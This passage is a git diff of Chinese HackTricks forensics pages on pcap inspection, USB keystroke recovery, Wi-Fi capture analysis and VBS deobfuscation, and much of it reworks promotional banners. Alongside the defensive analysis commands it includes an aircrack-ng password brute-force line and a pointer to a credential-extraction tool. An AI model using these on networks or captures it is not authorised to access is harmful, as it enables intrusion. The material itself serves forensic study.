-您可以使用Linux命令行工具**pdftotext**将PDF转换为文本并阅读它。 +您可以使用Linux命令行工具**pdftotext**将pdf转换为文本并阅读它。 diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 42215d430..3db4d0fdc 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,33 +1,34 @@ # Pcap 检查 +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) 上**关注**我们。 -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享**您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
-[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会。 +[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点会议。 {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -关于 **PCAP** 和 **PCAPNG** 的说明:PCAP 文件格式有两个版本;**PCAPNG 是较新的版本,不是所有工具都支持**。您可能需要使用 Wireshark 或其他兼容工具将文件从 PCAPNG 转换为 PCAP,以便在其他工具中使用。 +关于 **PCAP** 与 **PCAPNG** 的说明:PCAP 文件格式有两个版本;**PCAPNG 是较新的版本,不是所有工具都支持**。您可能需要使用 Wireshark 或其他兼容工具将文件从 PCAPNG 转换为 PCAP,以便在其他工具中使用。 {% endhint %} ## 用于 pcap 的在线工具 -* 如果您的 pcap 文件头部**损坏**,您应该尝试使用以下工具**修复**:[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -* 在 [**PacketTotal**](https://packettotal.com) 中提取 pcap 中的**信息**并搜索**恶意软件** +* 如果您的 pcap 文件头部**损坏**,您应该尝试使用以下链接进行**修复**:[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* 在 [**PacketTotal**](https://packettotal.com) 中提取**信息**并搜索 pcap 中的**恶意软件** * 使用 [**www.virustotal.com**](https://www.virustotal.com) 和 [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) 搜索**恶意活动** ## 提取信息 @@ -37,10 +38,10 @@ ### Wireshark {% hint style="info" %} -**如果您要分析 PCAP,基本上必须了解如何使用 Wireshark** +**如果您要分析 PCAP 文件,基本上必须了解如何使用 Wireshark** {% endhint %} -您可以在以下位置找到一些 Wireshark 技巧: +您可以在以下链接找到一些 Wireshark 技巧: {% content-ref url="wireshark-tricks.md" %} [wireshark-tricks.md](wireshark-tricks.md) @@ -48,7 +49,7 @@ ### Xplico 框架 -[**Xplico** ](https://github.com/xplico/xplico)_(仅适用于 Linux)_ 可以**分析** pcap 并从中提取信息。例如,Xplico 可从 pcap 文件中提取每封电子邮件(POP、IMAP 和 SMTP 协议)、所有 HTTP 内容、每个 VoIP 通话(SIP)、FTP、TFTP 等。 +[**Xplico** ](https://github.com/xplico/xplico)_(仅限 Linux)_ 可以**分析** pcap 并从中提取信息。例如,Xplico 可从 pcap 文件中提取每封电子邮件(POP、IMAP 和 SMTP 协议)、所有 HTTP 内容、每个 VoIP 通话(SIP)、FTP、TFTP 等。 **安装** ```bash @@ -69,7 +70,7 @@ sudo apt-get install xplico ### NetworkMiner 与Xplico一样,这是一个用于**分析和提取pcap文件中对象的工具**。它有一个免费版本,您可以[**在这里下载**](https://www.netresec.com/?page=NetworkMiner)。它适用于**Windows**。\ -这个工具还可以用来从数据包中获取**其他信息的分析**,以便更快地了解发生了什么。 +这个工具还可以用来从数据包中**分析其他信息**,以便更快地了解发生了什么。 ### NetWitness Investigator @@ -91,13 +92,13 @@ capinfos capture.pcap ``` ### Ngrep -如果你想在 pcap 文件中查找某些内容,可以使用 ngrep。以下是使用主要过滤器的示例: +如果你想在 pcap 文件中查找某些内容,可以使用 **ngrep**。以下是使用主要过滤器的示例: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` ### 数据恢复 -使用常见的数据恢复技术可以从 pcap 中提取文件和信息: +使用常见的数据恢复技术可以帮助从 pcap 中提取文件和信息: {% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) @@ -105,7 +106,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192. ### 捕获凭据 -您可以使用类似 [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) 的工具来解析 pcap 或实时接口中的凭据。 +您可以使用类似 [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) 这样的工具来解析从 pcap 或实时接口中提取的凭据。
@@ -132,15 +133,15 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log [**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) 是一个工具,可以: -- 读取 PCAP 文件并提取 Http 流。 -- 对任何压缩流进行 gzip 解压缩。 -- 使用 yara 扫描每个文件。 -- 写入 report.txt。 -- 可选择将匹配的文件保存到一个目录中。 +* 读取 PCAP 文件并提取 Http 流。 +* 对任何压缩流进行 gzip 解压缩。 +* 使用 yara 扫描每个文件。 +* 写入 report.txt。 +* 可选择将匹配的文件保存到一个目录中。 ### 恶意软件分析 -检查是否能找到任何已知恶意软件的指纹: +检查是否可以找到任何已知恶意软件的指纹: {% content-ref url="../malware-analysis.md" %} [malware-analysis.md](../malware-analysis.md) @@ -150,9 +151,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log > [Zeek](https://docs.zeek.org/en/master/about.html) 是一个被动的、开源的网络流量分析器。许多运营商将 Zeek 用作网络安全监视器(NSM),以支持对可疑或恶意活动的调查。Zeek 还支持广泛的流量分析任务,超出了安全领域,包括性能测量和故障排除。 -基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您将需要使用 **其他工具** 来分析包含有关 **pcaps** 的信息的日志。 - -### 连接信息 +基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您将需要使用 **其他工具** 来分析包含有关 pcaps 的 **信息** 的日志。 ```bash #Get info about longest connections (add "grep udp" to see only udp traffic) #The longest connection might be of malware (constant reverse shell?) @@ -219,7 +218,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` -## 其他pcap分析技巧 +## 其他 pcap 分析技巧 {% content-ref url="dnscat-exfiltration.md" %} [dnscat-exfiltration.md](dnscat-exfiltration.md) @@ -237,20 +236,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
-[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。以**促进技术知识**为使命,这个大会是技术和网络安全专业人士在各个领域的热点会议。 +[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。以**促进技术知识**为使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会。 {% embed url="https://www.rootedcon.com/" %} +{% hint style="success" %} +学习并实践 AWS 黑客技能:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并实践 GCP 黑客技能:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index 674efc3e7..05712ecd1 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,41 +1,43 @@ +{% hint style="success" %} +学习并练习AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} -如果您有一个USB连接的pcap文件,其中有很多中断,那么这可能是一个USB键盘连接。 +如果您有一个USB连接的pcap文件,其中有很多中断,很可能是USB键盘连接。 类似这样的Wireshark过滤器可能会有所帮助:`usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` 重要的是要知道以"02"开头的数据是使用Shift键按下的。 -您可以在以下链接中阅读更多信息并找到一些关于如何分析这些数据的脚本: +您可以在以下链接中阅读更多信息并找到一些关于如何分析这些内容的脚本: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) +{% hint style="success" %} +学习并练习AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index d15d92241..abc429141 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,43 +1,45 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -如果您有包含类似以下键盘USB通信的pcap文件: +如果你有一个包含键盘 USB 通信的 pcap 文件,类似下面这样的: ![](<../../../.gitbook/assets/image (613).png>) -您可以使用工具[**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser)来获取通信中写入的内容: +你可以使用工具 [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) 来获取通信中写入的内容: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` -您可以在以下链接中找到更多关于如何分析此内容以及一些脚本: +您可以阅读更多信息并找到关于如何分析此内容的一些脚本: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 28504b8b9..fa2aed04f 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -# 检查BSSID +# 检查BSSIDs -当您收到一个主要流量为Wifi的捕获时,您可以使用WireShark开始调查捕获中的所有SSID,方法是_Wireless --> WLAN Traffic_: +当你收到一个主要流量为Wifi的捕获文件时,你可以使用 WireShark 开始调查捕获文件中所有的 SSID,路径为_Wireless --> WLAN Traffic_: ![](<../../../.gitbook/assets/image (424).png>) @@ -23,23 +24,23 @@ ## 暴力破解 -该屏幕的一列指示**在pcap中是否找到任何身份验证**。如果是这种情况,您可以尝试使用`aircrack-ng`进行暴力破解: +屏幕的一列指示了 pcap 文件中是否找到**任何身份验证**。如果是这种情况,你可以尝试使用 `aircrack-ng` 进行暴力破解: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` -# 数据在信标/侧通道中 +# 在信标/侧通道中的数据 -如果您怀疑**数据正在Wifi网络的信标中泄漏**,您可以使用类似以下过滤器来检查网络的信标:`wlan contains `,或者 `wlan.ssid == "NAMEofNETWORK"`,在过滤后的数据包中搜索可疑字符串。 +如果你怀疑**数据正在泄漏到Wifi网络的信标中**,你可以使用类似以下过滤器来检查网络的信标:`wlan contains `,或者 `wlan.ssid == "NETWORK名称"`,在过滤后的数据包中搜索可疑字符串。 -# 在Wifi网络中查找未知MAC地址 +# 在Wifi网络中查找未知的MAC地址 以下链接将有助于找到**在Wifi网络中发送数据的设备**: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -如果您已经知道**MAC地址,您可以从输出中删除它们**,添加类似这样的检查:`&& !(wlan.addr==5c:51:88:31:a0:3b)` +如果你已经知道**MAC地址,你可以从输出中删除它们**,添加类似这样的检查:`&& !(wlan.addr==5c:51:88:31:a0:3b)` -一旦您发现**在网络中通信的未知MAC地址**,您可以使用类似以下的**过滤器**:`wlan.addr== && (ftp || http || ssh || telnet)` 来过滤其流量。请注意,如果您已解密流量,ftp/http/ssh/telnet过滤器将非常有用。 +一旦你发现**在网络中通信的未知MAC地址**,你可以使用类似以下的**过滤器**:`wlan.addr== && (ftp || http || ssh || telnet)` 来过滤其流量。请注意,如果你已解密流量,ftp/http/ssh/telnet过滤器将非常有用。 # 解密流量 diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76a99f9f3..5f0858f64 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} 在这里,您可以找到特定文件类型和/或软件的有趣技巧: @@ -32,21 +33,3 @@ {% page-ref page="video-and-audio-file-analysis.md" %} {% page-ref page="zips-tricks.md" %} - - - - - -
- -从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) - -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 - -
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 7844744e6..fc19bbb8e 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +学习和实践AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} -一些有助于调试/反混淆恶意VBS文件的方法: +一些有用于调试/反混淆恶意VBS文件的技巧: ## echo ```bash @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
